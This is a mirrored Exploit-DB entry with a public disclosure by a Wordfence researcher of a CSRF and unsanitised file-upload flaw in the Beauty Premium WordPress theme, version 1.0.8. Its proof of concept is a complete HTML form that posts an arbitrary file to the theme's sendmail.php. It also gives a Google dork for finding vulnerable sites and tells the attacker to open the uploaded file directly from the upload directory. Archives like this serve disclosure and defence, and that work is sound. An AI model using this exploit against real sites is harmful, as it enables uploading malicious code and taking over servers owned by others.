bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/39552.txt
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

36 lines
No EOL
2.1 KiB
Text
Raw Blame History

* Exploit Title: Wordpress Beauty Theme File Upload Vulnerability v1.0.8
* Discovery Date: 02.09.2016
* Public Disclosure Date:03.09.2016
* Vendor Homepage: http://www.yourinspirationweb.com
* Exploit Author: Colette Chamberland (Wordfence)
* Contact: colette@wordfence.com
* Version: 1.0.8 (may affect newer versions but this was all I had)
* Tested on: Wordpress 4.2.x-4.4.x
Description
================================================================================
The Beauty Premium theme contains a contact form that is vulnerable to CSRF
and File Upload vulnerability in the sendmail.php file. The file attachment
gets uploaded to the wordpress upload directory and it is not sanitized,
allowing attackers to upload harmful code.
PoC
================================================================================
Google Dork inurl:themes/beauty-premium/ or detect via WPScan:
<form method="post" action="http://[target]/wp-content/themes/beauty-premium/includes/sendmail.php" enctype="multipart/form-data">
<input type="text" name="yiw_contact[name]" id="name-test" class="required" value="test" />
<input type="text" name="yiw_contact[email]" id="email-test" class="required email-validate" value="test@nowhere.com" />
<input type="text" name="yiw_contact[phone]" id="phone-test" class="" value="1234567890" />
<input type="text" name="yiw_contact[website]" id="website-test" class="" value="http://www.blah.com" />
<textarea name="yiw_contact[message]" id="message-test" rows="8" cols="30" class="required">This is a FUV test&lt;/textarea&gt;
<input type="file" name="yiw_contact[file]" allow="text/*" maxlength="50">
<li class="submit-button">
<input type="hidden" name="yiw_action" value="sendemail" id="yiw_action" />
<input type="hidden" name="yiw_referer" value="http://[target]/wp-content/themes/beauty-premium/includes/sendmail.php" />
<input type="hidden" name="id_form" value="test" />
<input type="submit" name="yiw_sendemail" value="send message" class="sendmail alignright" /> </li>
</form>
You will receive a 404 error after posting, but navigate to the sites upload directory and access your uploaded file directly.
Reference in a new issue View git blame Copy permalink